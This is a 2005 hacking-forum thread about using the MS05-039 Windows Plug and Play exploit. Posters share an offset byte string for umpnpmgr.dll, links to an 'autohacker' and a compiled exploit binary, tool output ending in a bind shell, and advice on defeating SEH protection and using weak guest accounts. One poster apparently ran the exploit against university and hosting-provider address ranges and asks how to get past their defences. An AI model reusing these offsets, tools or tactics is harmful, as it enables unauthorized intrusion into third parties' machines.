wellp, that wasn't all too smart... considering this is a whitehat forum... anyway I made an autohacker for that reverse bindshell, ppl, if you are interested, and please keep your criticism to yourself, thanks. Oh, and 10x pita for the mod: http://www.governmentsecurity.org/forum/in...02entry124702
majestic
Aug 17 2005, 11:41 AM
QUOTE(apoc_neo @ Aug 17 2005, 11:36 AM) QUOTE(majestic @ Aug 17 2005, 11:20 AM) There's something that I can't solve, maybe some of you can. There are some ranges like (washington.edu) 128.95 that have some protection. When I say protection I mean that the exploit doesn't affect their computers. That's what happens when you try: [*] connecting to 128.95.x.x:445...ok [*] null session...ok [*] bind pipe...ok [*] sending crafted packet...ok [*] check your shell on 128.95.x.x:7400 It gets stuck as usual, but it never opens the port on any of their computers. RACKSPACE.com servers have this protection too. How can I make this protection on my net-range and is it possible to pass it? If it is, how? wellp, that wasn't all too smart... considering this is a whitehat forum... anyway I made an autohacker for that reverse bindshell, ppl, if you are interested, and please keep your criticism to yourself, thanks. Oh, and 10x pita for the mod: http://www.governmentsecurity.org/forum/in...02entry124702
I just wanted to know how I can secure my net-range with that protection instead of patching all my servers one by one, that's all. Thanks anyway, great job.
brOmstar
Aug 17 2005, 11:43 AM
You talked about hacking a university and also a provider, that's what I know.
ps. you meant how to secure your owned boxes... if you are the admin of a BIG range you should know that a firewall should help, or stop the pnp service, or apply the patch via a batch, or..or..or.. but you try to fool us.
You hack other boxes to find out how to patch your boxes... try a better story!
majestic
Aug 17 2005, 11:53 AM
QUOTE(brOmstar @ Aug 17 2005, 11:43 AM) You talked about hacking a university and also a provider, that's what I know. ps. you meant how to secure your owned boxes... if you are the admin of a BIG range you should know that a firewall should help, or stop the pnp service, or apply the patch via a batch, or..or..or.. but you try to fool us. You hack other boxes to find out how to patch your boxes... try a better story!
I don't give a shit if you believe me or not. Just stay away from me. Ignore me.
Paul
Aug 17 2005, 11:56 AM
stay on topic .. ??
Try this one:
/* pop reg; pop reg; retn; - umpnpmgr.dll */ "\x6D\x24\x01\x01" /* 0x101246D NL */
It works on W2K ENG, but should also work on nl.. (it's from xp-nl no sp)
BuzzDee
Aug 17 2005, 11:57 AM
sry majestic, but I think this thread will lead to one thing: the deletion of your account (at least that's what I plead for...)
Skunky88
Aug 17 2005, 12:53 PM
I'm not sure about this but I think I found out something interesting.. if the exploit is frozen for a while after the message to check the shell, the shell is working; if there's no waiting time then it doesn't! Maybe I'm just crazy and should sleep now...
[eXPhase
Aug 17 2005, 01:49 PM
QUOTE(Skunky88 @ Aug 17 2005, 12:53 PM) I'm not sure about this but I think I found out something interesting.. if the exploit is frozen for a while after the message to check the shell, the shell is working; if there's no waiting time then it doesn't! Maybe I'm just crazy and should sleep now...
It hangs indeed if the exploit did work.
MilchKuh
Aug 17 2005, 05:43 PM
QUOTE(Hehe0815 @ Aug 17 2005, 10:59 AM) *lol* sry, was a little bit confused, but didn't get an error while compiling, changed like above: http://web270.cyberwebserver-04.de/expl.exe
I downloaded this exploit and it's 153 kb, why so big? I compiled it by myself and it's only 61 kb and I didn't get any compiling error. And the exploit in the autohacker from apoc_neo is only 27 kb. Can someone explain this oO? Cause I don't want to use the wrong exploit. So can someone give me a link to a real working one, who has already tested it? thx in advance
nolimit
Aug 17 2005, 05:45 PM
QUOTE(Killaloop @ Aug 16 2005, 01:40 PM) QUOTE(nolimit @ Aug 16 2005, 10:20 AM) Well done. I forget, this is still usable in XP/2k3 with an established share, right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OS's, it's not uncommon for them to shift.
this exploit uses SEH which is registered on XPSP2/2K3, you would need to rewrite it so that it overwrites the complete SEH register. and for Win2k3 you would not only be authenticated, but also with an administrator account, which makes this quite useless
First, what's wrong with writing in something to overwrite the SEH in sp2? It takes 5 minutes, and could yield an OS independent exploit. The return is based in services.exe, so the SEH filter will let it through without question. Second, while you need an admin account for authentication for 2003, just a regular account will suffice for XP. A regular user account is very easy to guess on a network, and they are used very insecurely.
MpR
Aug 17 2005, 08:36 PM
QUOTE(nolimit @ Aug 17 2005, 05:45 PM) QUOTE(Killaloop @ Aug 16 2005, 01:40 PM) QUOTE(nolimit @ Aug 16 2005, 10:20 AM) Well done. I forget, this is still usable in XP/2k3 with an established share, right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OS's, it's not uncommon for them to shift. this exploit uses SEH which is registered on XPSP2/2K3, you would need to rewrite it so that it overwrites the complete SEH register. and for Win2k3 you would not only be authenticated, but also with an administrator account, which makes this quite useless First, what's wrong with writing in something to overwrite the SEH in sp2? It takes 5 minutes, and could yield an OS independent exploit. The return is based in services.exe, so the SEH filter will let it through without question. Second, while you need an admin account for authentication for 2003, just a regular account will suffice for XP. A regular user account is very easy to guess on a network, and they are used very insecurely.
Well nolimit, when I said I was going to bed this morning I didn't quite make it, at work atm with no sleep ... Well, back to the point: if you login through netbios with a guest account and then smash services.exe it does the freak out, no shell atm, didn't get a chance to finish up with my playing but points there.. A lil zombied right now so forgive me if I make little to no sense. There's a few probs though with implication in the wild: with a XP SP1 box running with no password or a weak password, they shouldn't be online first off and are prob part of a 500 kids botnet. RestrictAnonymous seems to nuke this, haven't tested fully but think worked around. I'm sure I'm not going to spend much more time with this though, but concept proven for whomever. How I made services crash was connecting to a network share before I smashed, but there's a few more variables involved, but meh, Imma put my head down on my desk now and go to sleep for a bit. enjoy
Skunky88
Aug 18 2005, 01:23 PM
I wondered about the size of the compiled exploit, too! It was also found by ZoneAlarm AV as an ircbot?
CODE
Aliases: [Win32.]Tpbot.A; [Win32.]Peabot.A; [Win32.]MS05-039!exploit; [W32/]IRCbot.worm!MS05-039 (McAfee); [Win32/]MS05-039!exploit!Worm; [W32.]Zotob.E (Symantec); [Net-Worm.]Win32.Small.d (Kaspersky); [WORM_]RBOT.CBQ (Trend); [W32/]Tpbot-A (Sophos);
Date Modified: 17-Aug-2005
Date Published: 16-Aug-2005
yeyo
Aug 18 2005, 02:05 PM
QUOTE(Skunky88 @ Aug 18 2005, 01:23 PM) I wondered about the size of the compiled exploit, too! It was also found by ZoneAlarm AV as an ircbot? CODE Aliases: [Win32.]Tpbot.A; [Win32.]Peabot.A; [Win32.]MS05-039!exploit; [W32/]IRCbot.worm!MS05-039 (McAfee); [Win32/]MS05-039!exploit!Worm; [W32.]Zotob.E (Symantec); [Net-Worm.]Win32.Small.d (Kaspersky); [WORM_]RBOT.CBQ (Trend); [W32/]Tpbot-A (Sophos); Date Modified: 17-Aug-2005 Date Published: 16-Aug-2005
If it found it as an IRCBot I think that is normal, cause McAfee names it W32/IRCbot.worm!MS05-039. Aliases: Name CME-540, W32.Zotob.E (Symantec), W32/Tpbot-A (Sophos), WORM_RBOT.CBQ (Trend). But my McAfee detects it as Exploit-DcomRpc.gen ?¿? with the last def file (4561).
edit ---- from other thread
QUOTE this exploit is for pnp which is a service provided by rpc
soo ... it's good
Hehe0815
Aug 18 2005, 02:32 PM
ur question bout the filesize: I compiled it again with the same .c file I took last time and this time I got the error "internal file size mismatching", perhaps because of that my exe is bigger! But there's no ircworm in it, don't panic! Would be silly spreading one around in a sec board...... think that it is detected cause it's a part of the Zotob.... -*maybe dcom cause it uses the same port?!*
Killaloop
Aug 18 2005, 02:46 PM
QUOTE(nolimit @ Aug 17 2005, 05:45 PM) First, what's wrong with writing in something to overwrite the SEH in sp2? It takes 5 minutes, and could yield an OS independent exploit. The return is based in services.exe, so the SEH filter will let it through without question. Second, while you need an admin account for authentication for 2003, just a regular account will suffice for XP. A regular user account is very easy to guess on a network, and they are used very insecurely.
I know, but since your first post sounded to me like "well, let's just collect offsets for xp and win2k3", I wanted to point out that only replacing the offsets would not do the trick for these operating systems and that exploiting win2k3 is not of any use because one needs an admin account. Anyhow, I have never written an exploit for 2k3 and xp sp2; if you say it's easily done with this exploit, I'll keep it as this. Oh, on a side note, as some talked about Administrator/user accounts with blank passwords: I was not able to connect remotely to my endpoints on winxp sp2 with an account that does not have a password set. Could be that I did something wrong though.
MilchKuh
Aug 18 2005, 03:05 PM
Now I know why the compiled exploits have different sizes... because they were compiled with different compilers....
Mfg